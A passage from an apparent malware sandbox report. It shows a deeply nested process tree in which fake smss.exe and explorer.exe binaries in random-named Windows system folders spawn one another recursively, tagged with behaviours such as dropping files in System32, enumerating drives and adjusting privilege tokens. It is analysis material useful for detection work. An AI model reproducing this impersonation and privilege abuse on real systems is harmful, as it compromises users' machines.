        PID:18176
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        35⤵
        
        PID:24744
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        23⤵
        
        PID:23780
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:17824
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:16220
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:18452
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:15260
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:17132
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:14944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:16528
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:21496
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:16476
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:19712
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:13160
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14352
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17668
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:24428
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:12180
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        Drops file in System32 directory
        
        PID:13080
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14344
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:18260
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:25504
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        Executes dropped EXE
        
        PID:1040
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6100
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6448
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        Drops file in System32 directory
        
        PID:6840
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        Enumerates connected drives
        
        PID:6328
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7736
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:7540
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        Enumerates connected drives
        
        PID:8492
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:10124
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:10856
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:11808
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        Drops file in System32 directory
        
        PID:12892
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:13868
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:17980
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:19224
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:16576
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:14452
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:18016
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:25404
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:15164
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:17704
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:24764
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:14820
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:18064
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:14084
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18024
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:25088
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:12664
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14196
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17116
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:23456
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        Enumerates connected drives
        Drops file in System32 directory
        
        PID:11548
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12676
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14240
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17124
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:23756
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        Enumerates connected drives
        
        PID:5224
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:5952
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        Drops file in System32 directory
        
        PID:6184
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        Drops file in System32 directory
        
        PID:7316
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:8684
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        Drops file in System32 directory
        
        PID:9060
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        Enumerates connected drives
        
        PID:9276
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:10984
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        Enumerates connected drives
        
        PID:12040
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:13224
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:13988
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:16972
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        23⤵
        
        PID:25800
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:16856
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:18056
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:15220
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:17620
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        Enumerates connected drives
        
        PID:14860
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:16520
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:18904
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:14260
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17264
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:23940
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:12844
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18304
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:25424
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:11780
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12900
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13920
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        Enumerates connected drives
        
        PID:9308
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Enumerates connected drives
        
        PID:11016
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13188
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17332
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4188
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4748
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        Enumerates connected drives
        
        PID:5788
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:6888
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:800
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        Drops file in System32 directory
        
        PID:7244
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:8540
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        Enumerates connected drives
        
        PID:8932
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:10204
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:10936
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:11912
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:13020
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        32⤵
        
        PID:14284
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        33⤵
        
        PID:17472
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        22⤵
        
        PID:19272
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:25776
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        21⤵
        
        PID:16672
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:19656
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:14476
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:18008
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:24604
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:15196
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:16168
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:19036
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:14828
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:16536
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        Enumerates connected drives
        
        PID:14184
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:16584
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:19016
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:12740
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13368
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18144
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:11688
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17320
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        Drops file in System32 directory
        
        PID:10544
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:11320
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12392
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13972
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17304
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:23500
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        Drops file in System32 directory
        
        PID:9640
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:10152
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:11056
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:12132
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:13560
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14496
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17688
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:24756
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7700
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:7492
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:8452
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:8764
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
